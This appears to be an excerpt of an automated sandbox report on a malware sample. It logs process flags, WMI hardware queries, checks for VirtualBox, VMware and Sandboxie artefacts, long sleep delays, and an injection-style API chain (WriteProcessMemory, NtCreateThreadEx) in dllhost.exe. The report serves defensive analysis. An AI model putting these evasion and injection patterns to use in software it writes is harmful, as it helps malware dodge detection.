Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

41_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5296	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4458	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1854
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 401
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 370
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 360
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 358

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_38-245
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_20-17309
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.0 %
Source: C:\Windows\System32\lsass.exe	API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.1 %
Source: C:\Windows\System32\dwm.exe	API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516	Thread sleep count: 5296 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516	Thread sleep count: 4458 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312	Thread sleep count: 3184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312	Thread sleep count: 3723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376	Thread sleep count: 5108 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376	Thread sleep count: 1854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 344	Thread sleep count: 283 > 30
Source: C:\Windows\System32\dllhost.exe TID: 5688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5804	Thread sleep count: 401 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5804	Thread sleep time: -40100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1424	Thread sleep count: 356 > 30
Source: C:\Windows\System32\lsass.exe TID: 1424	Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2052	Thread sleep count: 370 > 30
Source: C:\Windows\System32\svchost.exe TID: 2052	Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 4812	Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756	Thread sleep count: 360 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756	Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3308	Thread sleep count: 358 > 30
Source: C:\Windows\System32\svchost.exe TID: 3308	Thread sleep time: -35800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3300	Thread sleep count: 294 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176	Thread sleep count: 335 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176	Thread sleep time: -33500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 896	Thread sleep count: 330 > 30
Source: C:\Windows\System32\svchost.exe TID: 896	Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3660	Thread sleep count: 320 > 30
Source: C:\Windows\System32\svchost.exe TID: 3660	Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2760	Thread sleep count: 311 > 30
Source: C:\Windows\System32\svchost.exe TID: 2760	Thread sleep time: -31100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7152	Thread sleep count: 292 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060	Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060	Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1028	Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1028	Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1780	Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep count: 291 > 30
Source: C:\Windows\System32\svchost.exe TID: 2780	Thread sleep count: 289 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEED894 FindFirstFileExW,	20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1D894 FindFirstFileExW,	20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1D894 FindFirstFileExW,	21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783D894 FindFirstFileExW,	40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922D894 FindFirstFileExW,	41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942D894 FindFirstFileExW,	41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1ED894 FindFirstFileExW,	42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21D894 FindFirstFileExW,	42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5D894 FindFirstFileExW,	43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92D894 FindFirstFileExW,	44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95D894 FindFirstFileExW,	44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDD894 FindFirstFileExW,	45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0D894 FindFirstFileExW,	45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1D894 FindFirstFileExW,	46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DD894 FindFirstFileExW,	47_2_000001EF056DD894
